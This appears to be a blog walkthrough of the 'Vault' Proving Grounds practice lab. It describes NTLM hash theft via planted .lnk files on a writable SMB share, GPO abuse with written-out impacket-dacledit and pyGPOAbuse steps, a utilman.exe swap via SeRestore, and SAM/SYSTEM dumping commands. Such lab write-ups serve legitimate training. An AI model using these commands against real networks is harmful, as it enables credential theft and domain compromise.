Enumeration

Nmap

Initial Nmap scan revealed SMB and some common Active Directory ports were open.

00 - nmap

SMB Null

SMB Null session was available. Moreover, there was a share where we could both read and write.

01 - smb null

The share was empty as seen below.

02 - empty share

Exploitation

NTLM Theft

Because the share was empty and I had a write permission, I decided to put some files created by ntlm_theft while listening with responder.

03 - ntlm_theft

The .lnk file worked and I obtained user’s NTLMv2 hash.

04 - lnk file

05 - hash

Then I simply cracked it using hashcat.

06 - cracked

And obtained the user flag.

07 - user flag

Privilege Escalation (1st way - GPO Abuse)

Bloodhound Python

After obtaining user credentials I executed bloodhount python.

12 - bloodhound python

Then I found out that the user had WriteDACL permissions over Default GPO.

13 - gpo writedacl

GPO Abuse

At first I used impacket-dacledit to give myself GenericAll privileges over GPO.

impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ANIRUDH' -target-dn 'CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=POLICIES,CN=SYSTEM,DC=VAULT,DC=OFFSEC' 'vault.offsec'/'anirudh':'<PASSWORD>'

14 - dacledit

Then using pyGPOAbuse tool, I abused the default GPO which creates a scheduled task to add user named John with password H4x00r123...

15 - pygpoabuse

And on user winrm shell, I used gpupdate /force command to update the GPO.

16 - gpupdate

Then I simply logged in as John and read Admin flag.

17 - gg

Privilege Escalation (2nd way - SeRestore Privilege)

User had SeRestore Privilege and RDP port was open. So I could simply overwrite C:\Windows\System32\utilman.exe with cmd.exe.

18 - restore priv

Then I used rdektop to open lock screen.

19 - rdesktop

And I simply clicked Windows+U on my keyboard and got SYSTEM Shell.

20 - gg

Privilege Escalation (Failed way - SeBackup Privilege)

Trying to dump Admin Hash

SeBackupPrivilege was enabled. We could simply copy SYSTEM and SAM and dump Administrator credentials.

08 - sebackupprivilege

I used below commands to copy SYSTEM and SAM.

cd c:\ProgramData
reg save hklm\sam sam_bak
reg save hklm\system system_bak

09 - download files

We could either use pypykatz or impacket-secretsdump to dump Administrator hash.

impacket-secretsdump -system system_bak -sam sam_bak LOCAL
pypykatz registry --sam sam_bak system_bak

10 - admin hash

10 - admin hash 2

However, we could not login as Administrator. Because only user that is allowed to have remote connections is anirudh user.

Trying Diskshadow and Robocopy

I then tried different method found in k4sth4/SeBackupPrivilege, which tries to create copy disk of disk C.

image

However, it also did not work.

image

<
Previous Post
Kevin - Proving Grounds Practice
>
Next Post
Resourced - Proving Grounds Practice